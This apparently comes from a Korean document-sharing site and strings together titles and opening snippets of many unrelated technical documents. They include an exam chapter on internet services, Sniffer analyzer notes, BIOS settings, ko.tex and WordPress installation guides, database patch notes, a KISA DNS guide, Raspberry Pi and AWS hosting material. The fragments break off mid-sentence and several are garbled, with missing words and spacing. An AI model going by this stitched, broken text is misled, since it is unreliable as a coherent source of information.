----------------6강 정보통신과 인터넷(1)------------- **주요 키워드 ** (1) 인터넷 서비스 (2) 도메인네임, IP 주소 (3) 인터넷 익스플로러 (4) 정보검색 (5) 인터넷 용어 (1) 인터넷 서비스******************************* [08/4][08/2] 1. 다음 중 인터넷 서비스에 대한 설명으로
ARMBOOT 1
100% 2003222 : : : () PGPnet 1 (Sniffer) 1, 2,,, (Sniffer), (Sniffer),, (Expert) 3, (Dashboard), (Host Table), (Matrix), (ART, Application Response Time), (History), (Protocol Distribution), 1 (Select
R50_51_kor_ch1
S/N : 1234567890123 Boot Device Priority NumLock [Off] Enable Keypad [By NumLock] Summary screen [Disabled] Boor-time Diagnostic Screen [Disabled] PXE OPROM [Only with F12]
28 THE ASIAN JOURNAL OF TEX [2] ko.tex [5]
The Asian Journal of TEX, Volume 3, No. 1, June 2009 Article revision 2009/5/7 KTS THE KOREAN TEX SOCIETY SINCE 2007 2008 ko.tex Installing TEX Live 2008 and ko.tex under Ubuntu Linux Kihwang Lee * [email protected]
10X56_NWG_KOR.indd
디지털 프로젝터 X56 네트워크 가이드 이 제품을 구입해 주셔서 감사합니다. 본 설명서는 네트워크 기능 만을 설명하기 위한 것입니다. 본 제품을 올바르게 사 용하려면 이 취급절명저와 본 제품의 다른 취급절명저를 참조하시기 바랍니다. 중요한 주의사항 이 제품을 사용하기 전에 먼저 이 제품에 대한 모든 설명서를 잘 읽어 보십시오. 읽은 뒤에는 나중에 필요할 때
망고100 보드로 놀아보자-4
망고 100 보드로놀아보자 -4 Minicom,tftp,nfs 설정,vnc 설정 minicom 설정 Minicom 설정 >#yum install minicom >#ls /dev/ttyusb* ># minicom s Minicom 설정 Serial Device :/dev/ttyusb0 Baudrate:115200 Hardware Flow control: NO
목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate
ALTIBASE HDB 6.1.1.5.6 Patch Notes 목차 BUG-39240 offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG-41443 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate 한뒤, hash partition
bn2019_2
arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily
KISA-GD
KISA-GD-2011-0002 2011.9 1) RD(Recursive Desired) 플래그 : 리커시브네임서버로하여금재귀적 (recursive) 질의 ( 항목 1.3. 참고 ) 요청을표시함. RD 플레그값이 0 이면반복적 (iterative) 질의를요청 2) AA 플래그 : Authoritative Answer 의약자로써, 네임서버가해당응답데이터를자신이보유하고있는지유무를표시
ETL_project_best_practice1.ppt
ETL ETL Data,., Data Warehouse DataData Warehouse ETL tool/system: ETL, ETL Process Data Warehouse Platform Database, Access Method Data Source Data Operational Data Near Real-Time Data Modeling Refresh/Replication
StruxureWare Data Center Expert 7.2.x 의 새 기능 StruxureWare Data Center Expert 7.2.x 릴리스에서 사용할 수 있는 새 기능에 대해 자세히 알아보십시오. 웹 클라이언트 시작 화면: StruxureWare Cen
Online Help StruxureWare Data Center Expert Version 7.2.4 StruxureWare Data Center Expert 7.2.x 의 새 기능 StruxureWare Data Center Expert 7.2.x 릴리스에서 사용할 수 있는 새 기능에 대해 자세히 알아보십시오. 웹 클라이언트 시작 화면: StruxureWare
본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인
스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게
Microsoft PowerPoint - User Manual-100 - 20150521.pptx
CIC-100 사용 설명서 (User Manual) 나의 커뮤니티, 보는 이야기 TocView [모델명 : CIC-100] 주의사항 매뉴얼의 내용은 서비스 향상을 위하여 개별 사용자의 사전 동의 또는 별도의 공지 없이 변경될 수 있습니다. 사용자의 인터넷 환경에 따라 제품 성능 및 기능의 제작 또는 사용이 불가능할 수 있습니다. 본 제품의 이용 중 장애에 의하여
Learn Raspberry Pi with Linux by Peter Membrey, David Hows Original English language edition published by Apress, Inc. Copyright c 2013 by Apress. Kor
R A S P B E R R Y P I L I N U X Learn Raspberry Pi with Linux by Peter Membrey, David Hows Original English language edition published by Apress, Inc. Copyright c 2013 by Apress. Korean edition copyright
CPX-E-EC_BES_C_ _ k1
CPX-E CPX-E-EC EtherCAT 8071155 2017-07 [8075310] CPX-E-EC CPX-E-EC-KO EtherCAT, TwinCAT (). :, 2 Festo CPX-E-EC-KO 2017-07 CPX-E-EC 1... 4 1.1... 4 1.2... 4 1.3... 4 1.4... 5 1.5... 5 2... 6 2.1... 6
Web Application Hosting in the AWS Cloud Contents 개요 가용성과 확장성이 높은 웹 호스팅은 복잡하고 비용이 많이 드는 사업이 될 수 있습니다. 전통적인 웹 확장 아키텍처는 높은 수준의 안정성을 보장하기 위해 복잡한 솔루션으로 구현
02 Web Application Hosting in the AWS Cloud www.wisen.co.kr Wisely Combine the Network platforms Web Application Hosting in the AWS Cloud Contents 개요 가용성과 확장성이 높은 웹 호스팅은 복잡하고 비용이 많이 드는 사업이 될 수 있습니다. 전통적인
